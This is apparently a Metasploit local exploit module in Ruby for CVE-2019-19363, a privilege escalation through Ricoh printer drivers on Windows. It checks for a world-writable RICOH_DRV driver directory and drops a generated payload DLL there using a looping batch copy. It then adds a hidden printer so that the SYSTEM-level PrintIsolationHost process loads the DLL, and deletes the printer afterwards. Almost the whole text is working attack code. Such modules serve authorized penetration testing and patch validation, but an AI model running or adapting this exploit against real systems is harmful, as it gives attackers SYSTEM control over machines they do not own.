Ricoh Driver Privilege Escalation

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = NormalRanking

  include Msf::Post::File
  include Msf::Exploit::EXE
  include Msf::Post::Windows::Priv
  include Msf::Exploit::FileDropper
  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Ricoh Driver Privilege Escalation',
        'Description' => %q{
          Various Ricoh printer drivers allow escalation of
          privileges on Windows systems.

          For vulnerable drivers, a low-privileged user can
          read/write files within the `RICOH_DRV` directory
          and its subdirectories.

          `PrintIsolationHost.exe`, a Windows process running
          as NT AUTHORITY\SYSTEM, loads driver-specific DLLs
          during the installation of a printer. A user can
          elevate to SYSTEM by writing a malicious DLL to
          the vulnerable driver directory and adding a new
          printer with a vulnerable driver.

          This module leverages the `prnmngr.vbs` script
          to add and delete printers. Multiple runs of this
          module may be required given successful exploitation
          is time-sensitive.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Alexander Pudwill', # discovery & PoC
          'Pentagrid AG',       # PoC
          'Shelby Pace'         # msf module
        ],
        'References' => [
          [ 'CVE', '2019-19363'],
          [ 'URL', 'https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/']
        ],
        'Arch' => [ ARCH_X86, ARCH_X64 ],
        'Platform' => 'win',
        'Payload' => {
        },
        'SessionTypes' => [ 'meterpreter' ],
        'Targets' => [
          [
            'Windows', { 'Arch' => [ ARCH_X86, ARCH_X64 ] }
          ]
        ],
        'Notes' => {
          'SideEffects' => [ ARTIFACTS_ON_DISK ],
          'Reliability' => [ UNRELIABLE_SESSION ],
          'Stability' => [ SERVICE_RESOURCE_LOSS ]
        },
        'DisclosureDate' => '2020-01-22',
        'DefaultTarget' => 0,
        'Compat' => {
          'Meterpreter' => {
            'Commands' => %w[
              stdapi_sys_process_execute
            ]
          }
        }
      )
    )

    self.needs_cleanup = true
  end

  def check
    @driver_path = ''
    dir_name = "C:\\ProgramData\\RICOH_DRV"

    return CheckCode::Safe('No Ricoh driver directory found') unless directory?(dir_name)

    driver_names = dir(dir_name)

    return CheckCode::Detected("Detected Ricoh driver directory, but no installed drivers") unless driver_names.length

    vulnerable = false
    driver_names.each do |driver_name|
      full_path = "#{dir_name}\\#{driver_name}\\_common\\dlz"
      next unless directory?(full_path)

      @driver_path = full_path

      res = cmd_exec("icacls \"#{@driver_path}\"")
      next unless res.include?('Everyone:')
      next unless res.match(/\(F\)/)

      vulnerable = true
      break
    end

    return CheckCode::Detected('Ricoh driver directory does not have full permissions') unless vulnerable

    vprint_status("Vulnerable driver directory: #{@driver_path}")
    CheckCode::Appears('Ricoh driver directory has full permissions')
  end

  def add_printer(driver_name)
    fail_with(Failure::NotFound, 'Printer driver script not found') unless file?(@script_path)

    dll_data = generate_payload_dll
    dll_path = "#{@driver_path}\\headerfooter.dll"

    temp_path = expand_path('%TEMP%\\headerfooter.dll')
    vprint_status("Writing dll to #{temp_path}")

    bat_file_path = expand_path("%TEMP%\\#{Rex::Text.rand_text_alpha(5..9)}.bat")
    cp_cmd = "copy /y \"#{temp_path}\" \"#{dll_path}\""
    bat_file = <<~HEREDOC
      :repeat
      #{cp_cmd} && goto :repeat
    HEREDOC

    write_file(bat_file_path, bat_file)
    write_file(temp_path, dll_data)
    register_files_for_cleanup(bat_file_path, temp_path)

    script_cmd = "cscript \"#{@script_path}\" -a -p \"#{@printer_name}\" -m \"#{driver_name}\" -r \"lpt1:\""
    bat_cmd = "cmd.exe /c \"#{bat_file_path}\""
    print_status("Adding printer #{@printer_name}...")
    client.sys.process.execute(script_cmd, nil, { 'Hidden' => true })
    vprint_status("Executing script...")
    cmd_exec(bat_cmd)
  rescue Rex::Post::Meterpreter::RequestError => e
    e_log("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
  end

  def exploit
    fail_with(Failure::None, 'Already running as SYSTEM') if is_system?

    fail_with(Failure::None, 'Must have a Meterpreter session to run this module') unless session.type == 'meterpreter'

    if sysinfo['Architecture'] != payload.arch.first
      fail_with(Failure::BadConfig, 'The payload should use the same architecture as the target driver')
    end

    @printer_name = Rex::Text.rand_text_alpha(5..9)
    @script_path = "C:\\Windows\\System32\\Printing_Admin_Scripts\\en-US\\prnmngr.vbs"
    drvr_name = @driver_path.split('\\')
    drvr_name_idx = drvr_name.index('RICOH_DRV') + 1
    drvr_name = drvr_name[drvr_name_idx]

    add_printer(drvr_name)
  end

  def cleanup
    print_status("Deleting printer #{@printer_name}")
    Rex.sleep(3)
    delete_cmd = "cscript \"#{@script_path}\" -d -p \"#{@printer_name}\""
    client.sys.process.execute(delete_cmd, nil, { 'Hidden' => true })
  end
end